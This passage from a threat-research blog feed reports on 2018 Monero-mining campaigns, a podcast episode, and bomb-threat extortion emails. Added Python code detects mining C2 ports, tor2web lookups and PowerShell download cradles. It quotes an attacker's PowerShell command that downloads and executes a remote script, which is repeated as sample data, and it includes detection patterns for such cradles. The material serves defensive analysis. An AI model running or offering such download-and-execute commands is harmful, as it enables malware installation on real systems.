Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also requested a file called "TermsHost.exe" from the IP 39[.]108[.]177[.]252, as well as a file called "xmr.txt" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called "TermsHost.exe" hosted on their C2 ssvs[.]space and a Monero mining config file called "xmr.txt" on the C2 sydwzl[.]cn.<br /><br />When we ran both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file containing a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services.<br /><br />Note that Rocke activity tapered off towards the end of the year. Security researchers at the Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has been no activity on Rocke's GitHub since November, nor have we seen related samples in our honeypots since that time.<br /><br /><h4>8220 Mining Group</h4>As we described above, Rocke originally forked a repository called "whatMiner." We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — because of the default wallet and infrastructure in the repository's config files. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some of the same TTPs as Rocke. 
<br /><br />We first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. After exploitation, the actor would issue cURL requests over port 8220 to fetch several different types of malware from their infrastructure. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="30" data-original-width="577" height="32" src="https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s640/image6.png" width="640" /></a></div>We were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 Mining Group is likely responsible for.<br /><br />These campaigns illustrate that, beyond exploiting Struts2, 8220 Mining Group has also exploited the <a href="https://www.google.com/url?q=https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/&amp;sa=D&amp;ust=1545149724754000">Drupal</a> content management system, <a href="https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&amp;sa=D&amp;ust=1545149724756000">Hadoop YARN, Redis, WebLogic and CouchDB</a>. 
Besides leveraging malicious bash scripts, Git repositories and image-sharing services, as in whatMiner, 8220 Mining Group also carried out a long-running campaign using malicious <a href="https://www.google.com/url?q=https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers&amp;sa=D&amp;ust=1545149724758000">Docker images</a>. 8220 Mining Group was able to <a href="https://www.google.com/url?q=https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html&amp;sa=D&amp;ust=1545149724759000">amass</a> nearly $200,000 worth of Monero through their campaigns. <br /><br />There were some similarities between the TTPs used by Rocke and by 8220 Mining Group in these campaigns. The actors downloaded a malicious file named "logo*.jpg" (very similar to Rocke's use of malicious scripts under the file name "logo*.jpg"), which is executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, all of which we have also observed Rocke using.<br /><br /><h4>tor2mine</h4>Over the past few years, Talos has been monitoring accesses to tor2web services, which serve as a bridge between the internet and the Tor network, a system that enables anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and they keep the C2 server's IP address hidden. <br /><br />Recently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service used as a C2: qm7gmtaagejolddt[.]onion[.]to. 
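<br /><br />As an added example (not Talos code), the two network-level traits described above, C2 traffic on the 8220 Mining Group's namesake port and a tor2web gateway name in DNS, can be checked over Zeek-style conn and dns records. The log lines are constructed for this example, the external addresses are documentation ranges, the "internal" ranges are assumed to be RFC 1918 space, and the onion name is the one from this post.<br />

```python
"""Network-side checks for two traits of the mining groups in this post:
outbound connections to port 8220 (8220 Mining Group C2) and DNS lookups for
tor2web gateway names (tor2mine's C2 proxying). Added example, not Talos code."""
import ipaddress
import re
from typing import Dict, Iterable, List, Tuple

# Port named in the post as the 8220 Mining Group's usual C2 port; extend the
# set with what your own telemetry shows.
MINING_C2_PORTS = {8220}

# Assumption: RFC 1918 space is "home"; everything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# A tor2web-style gateway exposes <onion-name>.onion as <onion-name>.onion.<suffix>
# (the post's C2 is qm7gmtaagejolddt[.]onion[.]to). v2 onion names are 16 base32
# characters and v3 names are 56, so the pattern keys on the embedded onion name
# rather than on a fixed list of gateway suffixes.
TOR2WEB_RE = re.compile(r"^(?:[a-z0-9-]+\.)*([a-z2-7]{16}|[a-z2-7]{56})\.onion\.[a-z0-9.-]+$")

CONN_FIELDS = ("ts", "orig_h", "orig_p", "resp_h", "resp_p", "proto")
DNS_FIELDS = ("ts", "orig_h", "query")

# Constructed sample records (tab-separated, Zeek-like, trimmed to the fields used).
SAMPLE_CONN = """#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto
1545000000.1\t10.0.0.5\t51234\t203.0.113.10\t8220\ttcp
1545000001.2\t10.0.0.5\t51235\t203.0.113.10\t443\ttcp
1545000002.3\t10.0.0.7\t40000\t198.51.100.8\t8220\ttcp
1545000003.4\t10.0.0.9\t40001\t10.0.0.2\t8220\ttcp
1545000004.5\t10.0.0.9\t40002\t198.51.100.8\t8220\tudp
"""
SAMPLE_DNS = """#fields\tts\tid.orig_h\tquery
1545000005.6\t10.0.0.5\tqm7gmtaagejolddt.onion.to
1545000006.7\t10.0.0.6\twww.example.com
1545000007.8\t10.0.0.8\tonion.to
"""


def parse_tsv(lines: Iterable[str], fields: Tuple[str, ...]) -> List[Dict[str, str]]:
    """Parse tab-separated records, skipping Zeek '#' header lines and short rows."""
    records = []
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) < len(fields):
            continue
        records.append(dict(zip(fields, parts)))
    return records


def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def flag_mining_c2_ports(conn: Iterable[Dict[str, str]]) -> List[Tuple[str, str, int]]:
    """Outbound TCP connections from internal hosts to external hosts on a
    mining-C2 port. Internal-to-internal and non-TCP rows are ignored to cut noise."""
    hits = []
    for rec in conn:
        if rec["proto"] != "tcp":
            continue
        try:
            port = int(rec["resp_p"])
        except ValueError:  # Zeek writes '-' for unknown fields
            continue
        if port in MINING_C2_PORTS and is_internal(rec["orig_h"]) and not is_internal(rec["resp_h"]):
            hits.append((rec["orig_h"], rec["resp_h"], port))
    return hits


def flag_tor2web_queries(dns: Iterable[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """DNS queries whose name embeds an onion address under a clearnet suffix,
    i.e. a tor2web gateway being used to reach a hidden-service C2."""
    hits = []
    for rec in dns:
        match = TOR2WEB_RE.match(rec["query"].lower().rstrip("."))
        if match:
            hits.append((rec["orig_h"], rec["query"], match.group(1)))
    return hits


def run_demo() -> Dict[str, list]:
    """Run both checks over the constructed samples."""
    conn = parse_tsv(SAMPLE_CONN.splitlines(), CONN_FIELDS)
    dns = parse_tsv(SAMPLE_DNS.splitlines(), DNS_FIELDS)
    return {"c2_ports": flag_mining_c2_ports(conn), "tor2web": flag_tor2web_queries(dns)}


if __name__ == "__main__":
    for kind, hits in run_demo().items():
        for hit in hits:
            print(kind, *hit)
```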
<br /><br />It is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system:<br /><br /><blockquote class="tr_bq">C:\\Windows\\System32\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))</blockquote><br />We identified additional malware on this IP, which belongs to Total Server Solutions LLC. It includes 64-bit and 32-bit variants of XMRigCC (a variant of the XMRig miner), Windows executable versions of publicly available EternalBlue/EternalRomance exploit scripts, an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch files to avoid writing executables to disk. <br /><br />While researching the malware and infrastructure used in this campaign, we found <a href="https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron&amp;sa=D&amp;ust=1545149724777000">previous research</a> on a similar campaign. That actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability, and also relied on an IP hosted at Total Server Solutions LLC (107[.]181[.]160[.]197). 
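<br /><br />As an added example (not Talos code), the PowerShell cradle quoted above can be scored from process-creation command lines, giving weight to the combination of a remote fetch with in-memory execution rather than to any single launch flag. The command lines below are constructed (the cradle's shape is the one in this post, with a documentation-range IP in place of the real one), and the threshold is an assumption to tune against your own baseline.<br />

```python
"""Score process command lines (e.g. Sysmon Event ID 1 CommandLine values) for
the download-and-execute cradle seen in the tor2mine campaign: cmd.exe launching
powershell.exe with a hidden window, bypassed execution policy, DownloadString
and iex. Added example, not Talos code."""
import re
from typing import Dict, List, NamedTuple


class Indicator(NamedTuple):
    name: str
    pattern: re.Pattern
    weight: int


# Each indicator is one thing the cradle does. Weights favour "fetch remote
# text + execute it in memory" over the launch flags, which admins also use.
INDICATORS = [
    Indicator("hidden_window", re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b"), 2),
    Indicator("exec_policy_bypass", re.compile(r"(?i)-e(?:xecutionpolicy|xec|x|p)?\s+bypass\b"), 2),
    Indicator("no_profile", re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"), 1),
    Indicator("net_webclient", re.compile(r"(?i)new-object\s+(?:system\.)?net\.webclient"), 2),
    Indicator("download_string", re.compile(r"(?i)\.downloadstring\("), 3),
    Indicator("invoke_expression", re.compile(r"(?i)(?:^|[\s(])(?:iex|invoke-expression)\b"), 3),
    Indicator("http_url", re.compile(r"(?i)https?://[^\s'\"()]+"), 1),
]
THRESHOLD = 8  # assumption: tune against your own admin-script baseline

URL_RE = re.compile(r"(?i)https?://[^\s'\"()]+")

# Constructed samples: the post's cradle shape with a placeholder IP, a benign
# admin launch that shares one flag, and a plain download to disk.
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\System32\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None "
    "-ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient)"
    ".DownloadString('http://203.0.113.10/v1/check1.ps1'))",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -Command (New-Object Net.WebClient).DownloadFile("
    "'http://intranet.example.com/tool.zip','C:\\tmp\\tool.zip')",
]


def defang(url: str) -> str:
    """Write a URL in the hxxp://x[.]y form used in this post so it is not clickable."""
    return re.sub(r"(?i)^http", "hxxp", url).replace(".", "[.]")


def score_command_line(cmd: str) -> Dict[str, object]:
    """Return the matched indicator names, the summed score and any defanged URLs."""
    matched = [ind.name for ind in INDICATORS if ind.pattern.search(cmd)]
    score = sum(ind.weight for ind in INDICATORS if ind.name in matched)
    return {
        "command": cmd,
        "matched": matched,
        "score": score,
        "suspicious": score >= THRESHOLD,
        "urls": [defang(u) for u in URL_RE.findall(cmd)],
    }


def triage(command_lines: List[str]) -> List[Dict[str, object]]:
    """Score every command line; callers can then pivot on the URLs of the hits."""
    return [score_command_line(c) for c in command_lines]


if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} score={result['score']:2} {result['matched']} {result['urls']}")
```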
They also employed a script, "/win/checking-test.hta," that was almost identical to one we saw hosted on the tor2mine actor's C2, "check.hta":<br /><br />/win/checking-test.hta from <a href="https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron">previous campaign</a><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="1260" height="224" src="https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s640/image3.png" width="640" /></a></div>check.hta<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="923" height="248" src="https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s640/image4.png" width="640" /></a></div>This actor also dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw. Both campaigns additionally relied on the XHide Process Faker tool. <br /><br />Similarly, in <a href="https://www.google.com/url?q=https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/&amp;sa=D&amp;ust=1545149724785000">February 2018</a>, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. 
The actors used many of the same supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted at Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw. <br /><br />This malware was developed in Python and then converted to ELF executables with the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign.<br /><br /><h4>Conclusion</h4>By tracking the wallets of these groups, we estimate that they hold, and have made payments totaling, around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made, since the value of Monero is very volatile and it is difficult to tell what the currency was worth at the time it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate.<br /><br />The value of Monero has declined dramatically in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue. <br /><br />There remains the possibility that, with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that poses as ransomware. 
However, Rocke's GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.<br /><br />Talos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies.<br /><br /><h4>Coverage</h4>For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: <a href="https://www.google.com/url?q=https://talosintelligence.com/resources/59&amp;sa=D&amp;ust=1545149724800000">Blocking Cryptocurrency Mining Using Cisco Security Products</a><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="320" src="https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png" /></a></div><br />Advanced Malware Protection (<a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&amp;sa=D&amp;ust=1545149724807000">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />Cisco Cloud Web Security (<a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&amp;sa=D&amp;ust=1545149724809000">CWS</a>) or <a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&amp;sa=D&amp;ust=1545149724810000">Web Security Appliance (WSA)</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Network Security appliances such as <a 
href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&amp;sa=D&amp;ust=1545149724813000">Next-Generation Firewall (NGFW)</a>, <a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&amp;sa=D&amp;ust=1545149724814000">Next-Generation Intrusion Prevention System (NGIPS)</a>, and <a href="https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&amp;sa=D&amp;ust=1545149724816000">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&amp;sa=D&amp;ust=1545149724818000">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://www.google.com/url?q=https://umbrella.cisco.com/&amp;sa=D&amp;ust=1545149724820000">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.google.com/url?q=https://www.snort.org/products&amp;sa=D&amp;ust=1545149724823000">Snort.org</a>.<br /><br /><h3>IOCs</h3><h4>Rocke</h4>IPs:<br />Domains:<br />URLs:<br />SHA-256:<br />Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:<br />Wallets:<br /><h4>8220 Gang</h4>Samples associated with whatMiner:<br />Wallets:<br /><h4>Tor2mine</h4><h4>Uncategorized groups</h4><br /><br />https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html<br />2018-12-18T11:33:11.729-05:00<br /><br /><h3>Beers with Talos EP 43: Espionage, Encryption, and CISO Square One</h3>http://feedproxy.google.com/~r/feedburner/Talos/~3/bWRowfEFhZw/beers-with-talos-ep-43-espionage.html<br />beers with talos, Malware, mobile, podcast<br />noreply@blogger.com (Mitch Neff)<br />Fri, 14 Dec 2018 11:46:00 PST<br /><div dir="ltr" style="text-align: left;" trbidi="on"><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-AiSK3pQUuq4/XBfkoRJJLrI/AAAAAAAAE84/IPSwZtTkb-YGfh_4shvJ66YgcaFYYR1iACK4BGAYYCw/s1600/BWT_EP43_MattBubble.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-AiSK3pQUuq4/XBfkoRJJLrI/AAAAAAAAE84/IPSwZtTkb-YGfh_4shvJ66YgcaFYYR1iACK4BGAYYCw/s1600/BWT_EP43_MattBubble.jpg" /></a></div>Beers with Talos (BWT) Podcast Ep. #43 is now available. Download this episode and subscribe to Beers with Talos:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://4.bp.blogspot.com/-WLkU01IRCLw/WaWCg3YHpRI/AAAAAAAAAJA/nQ2rFarDFeAUBY4ncARRUVaNkMpBKC0KgCLcBGAs/s1600/itunes_button.png" /></a><a href="https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://2.bp.blogspot.com/-E-RSSZ9jbUY/WaWCkLGZnZI/AAAAAAAAAJE/Ciiz-Si4oA0cgR9tMGSGbT9336qrYuDeACLcBGAs/s1600/google_play_button.png" /></a><a href="https://www.stitcher.com/podcast/talos/beers-with-talos" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://1.bp.blogspot.com/-HIihRfTvh8I/WedjsKBFNhI/AAAAAAAAAKk/TCPBZoIkYdcW8QJujRtxxwjr70x4drh_wCEwYBhgL/s1600/stitcher_button.png" /></a></div><br />If iTunes and Google Play aren't your thing, click <a href="http://www.talosintelligence.com/podcast">here</a>.<br /><h3>Ep. #43 show notes:</h3>Recorded Dec. 7, 2018.<br /><br />Several of us are under the weather, but the show must go on. We did our best, as always. After running through some recent research, we spend a good bit of this EP looking, through the lens of a recent breach, at the first things a new security leader should get a handle on - what questions need to be answered? What information and practices are day-1 vital? 
We wrap up taking a look at a slew of vulns Talos uncovered in secure messaging apps.<br /><h3><a name='more'></a>The timeline:</h3><div><div><h4>The topics</h4>01:00 - Roundtable - we talk about the Reds, death by IoT lawnmowers, and the special Spam we get<br />12:40 - DNSpionage campaign and DNS redirection attacks<br />20:50 - Day One as CISO - Handling Inherited Risk as a Leader<br />50:45 - (in)Secure messenger apps - Ranging responses to vuln disclosures<br />1:02:36 - Closing thoughts and parting shots<br /><h4>The links</h4><div dir="ltr"><a href="https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" target="_blank">DNSpionage blog post</a></div><div dir="ltr"><a href="https://blog.talosintelligence.com/2018/12/secureim.html" target="_blank">(in)Secure messaging blog post</a></div></div><div><br /></div><div>==========</div><div><div dir="ltr"><br />Featuring: <a href="https://twitter.com/security_craig">Craig Williams</a> (@Security_Craig), <a href="https://twitter.com/JoelEsler">Joel Esler</a> (@JoelEsler), <a href="https://twitter.com/kpyke">Matt Olney</a> (@kpyke) and <a href="https://twitter.com/EnglishLFC">Nigel Houghton</a> (@EnglishLFC).<br />Hosted by <a href="https://twitter.com/MitchNeff">Mitch Neff</a> (@MitchNeff).<br />Find all episodes <a href="http://cs.co/talospodcast">here</a>.<br /><br /><a href="http://cs.co/talositunes">Subscribe via iTunes</a> (and leave a review!)<br /><br />Check out the <a href="http://cs.co/talosresearch">Talos Threat Research Blog</a><br /><br />Subscribe to the <a href="http://cs.co/talosupdate">Threat Source newsletter</a><br /><br />Follow <a href="http://cs.co/talostwitter">Talos on Twitter</a><br /><br />Give us your feedback and suggestions for topics:<br /><a href="mailto:beerswithtalos@cisco.com">beerswithtalos@cisco.com</a></div></div></div></div><br /><br />https://blog.talosintelligence.com/2018/12/beers-with-talos-ep-43-espionage.html<br />2018-12-17T13:02:52.032-05:00<br /><br /><h3>Bitcoin Bomb Scare Associated with Sextortion Scammers</h3>http://feedproxy.google.com/~r/feedburner/Talos/~3/rgRN4Fc1BGk/bitcoin-bomb-scare-associated-with.html<br />bitcoin, email, extortion, sextortion, spam<br />noreply@blogger.com (Jaeson Schultz)<br />Fri, 14 Dec 2018 09:57:00 PST<br /><div dir="ltr" style="text-align: left;" trbidi="on"><small><i>This blog was written by <a href="https://twitter.com/jaesonschultz">Jaeson Schultz</a>.</i></small><br /><br />Organizations across the country are on edge today after a flurry of phony bomb threats hit several public entities on Thursday, including universities, schools and news outlets. The attackers distributed malicious emails claiming to have placed some type of explosive material in the recipient's building. 
The emails stated that the attackers would detonate the explosives unless the victim made a Bitcoin payment; the samples we have seen demanded $20,000.<br /><br />Cisco Talos discovered that this campaign is actually an evolution of the sextortion and extortion attacks that we <a href="https://www.google.com/url?q=https://blog.talosintelligence.com/2018/10/anatomy-of-sextortion-scam.html&amp;sa=D&amp;ust=1544812443433000">reported on in October</a>. The claims in the emails we've seen from this actor are completely false, yet they have caused untold amounts of damage as organizations have evacuated buildings and called upon law enforcement to investigate.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-U4W9nck2Bq8/XBPrPJj05vI/AAAAAAAAAj4/GF33Al8J-9YvhJ3L5V9LNRtxkYDhjGVDACLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="886" data-original-width="1182" height="478" src="https://2.bp.blogspot.com/-U4W9nck2Bq8/XBPrPJj05vI/AAAAAAAAAj4/GF33Al8J-9YvhJ3L5V9LNRtxkYDhjGVDACLcBGAs/s640/image2.png" width="640" /></a><br /><small>An example of the malicious, phony emails that attackers sent out to organizations across the U.S. yesterday.</small></div><br /><br /><a name='more'></a>What sets these extortion messages apart from the other extortion scams we've monitored is that, until now, the attackers threatened only the individual recipient: they would threaten to expose sensitive data, or even to attack the recipient physically, but there was never a threat of harm to a larger group of people, and certainly not a bomb threat.<br /><br />Talos has discovered 17 distinct Bitcoin addresses that were used in the bomb extortion attack. Only two of the addresses have a positive balance, both from transactions received Dec. 13, the day the attacks were distributed. 
However, each of those transactions was for less than $1, so it is evident that the victims in this case declined to pay the $20,000 the attackers demanded.<br /><br />So far, all of the samples Talos has found associated with the bomb threat attack were sent from IP addresses belonging to the domain registrar and hosting company <a href="https://www.google.com/url?q=http://reg.ru&amp;sa=D&amp;ust=1544812443436000">reg.ru</a>, suggesting that the attackers may be using compromised credentials for domains hosted at that registrar. Multiple IPs involved in sending these bomb threats also sent the various types of sextortion email we saw in the previous campaign. In those cases, the attackers sent emails claiming to have compromising video of the victim and threatening to release it publicly unless the attacker received a Bitcoin payment.<br /><br />As of late yesterday, the bomb threat email attack morphed. The attackers have returned to their empty threats of harming the individual recipient; this time, they threaten to throw acid on the victim.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-3UGFLjsIWXA/XBPrYDcMswI/AAAAAAAAAj8/yK5YyQxUeJ4ZBUirquz-V1MhS584mlmIwCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="418" data-original-width="707" height="378" src="https://3.bp.blogspot.com/-3UGFLjsIWXA/XBPrYDcMswI/AAAAAAAAAj8/yK5YyQxUeJ4ZBUirquz-V1MhS584mlmIwCLcBGAs/s640/image1.png" width="640" /></a><br /><small>An example of the newer extortion emails, claiming they will dump acid on the victim unless they receive a Bitcoin payment.</small></div><br /><br />So far, none of the Bitcoin addresses associated with these new emails have received any payments. The source of the sending IP addresses changed, however. 
This time, the attackers are making heavy use of IP addresses at the Russian hosting company <a href="https://www.google.com/url?q=https://timeweb.com/ru&amp;sa=D&amp;ust=1544812443438000">TimeWeb</a>. As with the bomb threats, these IP addresses belong to domains that the attackers likely compromised.<br /><br />The criminals conducting these extortion email attacks have demonstrated that they are willing to concoct any threat and story imaginable that they believe would fool the recipient. At this point, we have seen several different variations of these emails, and we expect these sorts of attacks to continue as long as there are victims who will believe these threats to be credible, and be scared enough to send money to the attackers. Talos encourages users not to fall for these schemes and — above all — <b>DO NOT pay extortion payments</b>. Doing so will only confirm for the attackers that their social engineering approach is working, and victims' money goes directly toward facilitating additional attacks.<br /><br /><h4 id="h.hhnvb3od61h">IOCs (BTC Addresses)</h4>11B68RbmyxQys2CXXbAZxcwVXnaWCNBbw<br />12MET3CnEBkRc5Si5udf95fGaTZ6JwgpkK<br />132f8T1qF9hZj13MvPN5FbxrAhGExYZ7P3<br />149oyt2DL52Jgykhg5vh7Jm1QpdpfuyVqd<br />15F7TCqGRWE66xrBNxyt9ko1XsKaQvEh9t<br />15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM<br />1893DMwnrq9vA6JmQBdyWRKecArDAUTcGR<br />18UNWkvEDXgYzSAVnTmaR1X66w3T7HHsdn<br />1BTuxsCpAGtCzcszvFV2g4beqAZ2AUnyFh<br />1BfmmRBfhujpK944gai4vWvwCwGeHKbmkB<br />1BHasGex1jhRZeY7KyUGGKUNRtVgKedRY8<br />1CDs3JXUU6wNmndAF7EFcrJ6GGSYRKXd7w<br />1CF9VQhwjJutPxwVq5QLFA7j7baq4RDb3w<br />1CXrmcKL7W2o6FnrFx3ZBGn2EAsbMVZMzD<br />1CdD3nthrWR76RkL1WwLH7BSqCFASLjbhu<br />1D3ArQebDneVBVCqLort9jwvUA3AoZaNq5<br />1DVVQpxF4nG7rmuQFb7ZboGxu6ahKJcjf5<br />1Dnw2qJxGFCZdE3PzCaVioBB9zERc7SzRB<br />1DRXeydtqfjAmvfrLY7XiCo2A1vCq32z3a<br />1Ebf2rrLxVuMGKkwi2PeZtjBEEiidxrkkL<br />1FnTQHffH42iS15FMYNZxmNdbXtmb8WChF<br />1GTd6DPqcxCwX263BMsvk7FcjCQxsXhJUs<br 
